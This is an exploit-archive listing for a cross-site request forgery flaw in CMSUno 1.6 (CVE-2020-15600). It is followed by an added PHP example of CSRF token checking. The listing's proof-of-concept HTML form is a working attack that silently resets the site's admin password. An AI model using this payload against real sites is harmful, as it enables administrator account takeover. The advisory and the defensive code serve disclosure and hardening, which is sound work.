zdt | Noth | 1337DAY-ID-34698
History: Jul 17, 2020 - 12:00 a.m.

CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password) Vulnerability

2020-07-17 00:00:00
noth
0day.today
451

EPSS: 0.001 (Low), percentile 41.2%

Exploit for php platform in category web applications

# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/cmsuno-master/uno.php" method="POST">
<input type="hidden" name="user" value="admin"/>
<input type="hidden" name="pass" value="yourpassword"/>
<input type="submit" name="user" value="Submit request"/>
</form>
</body>
</html>

#  0day.today [2020-07-19]  #
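
The server-side check that rejects a request like the one in the PoC, as an added example that is not part of the original advisory and is not CMSUno's own code or its 1.6.1 fix. The `user` and `pass` field names come from the PoC; the `csrf_token` field, the function names and the handler itself are assumptions for illustration.

```php
<?php
// Added example: hypothetical credential-change handler, NOT CMSUno's uno.php.
// SameSite=Strict keeps the session cookie off cross-site POSTs (PHP 7.3+);
// the per-session token below is the primary defence.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

// Return the per-session CSRF token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the posted token matches the one stored in the session.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied)
        && $expected !== ''
        && hash_equals($expected, $supplied); // constant-time comparison
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // A form hosted on another origin cannot read this session's token,
    // so a request carrying only user/pass fails here.
    if (!csrf_valid($_SESSION, $_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    unset($_SESSION['csrf_token']); // single use: rotate after a state change
    // Hypothetical persistence step: store a hash, never the raw password.
    $hash = password_hash((string)($_POST['pass'] ?? ''), PASSWORD_DEFAULT);
    exit('Credentials updated');
}

// GET: render the form with the token embedded as a hidden field.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
?>
<form action="" method="POST">
<input type="hidden" name="csrf_token" value="<?= $token ?>"/>
<input type="text" name="user"/>
<input type="password" name="pass"/>
<input type="submit" value="Save"/>
</form>
```

Requiring the current password on the same form adds a second check that a forged request cannot satisfy.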
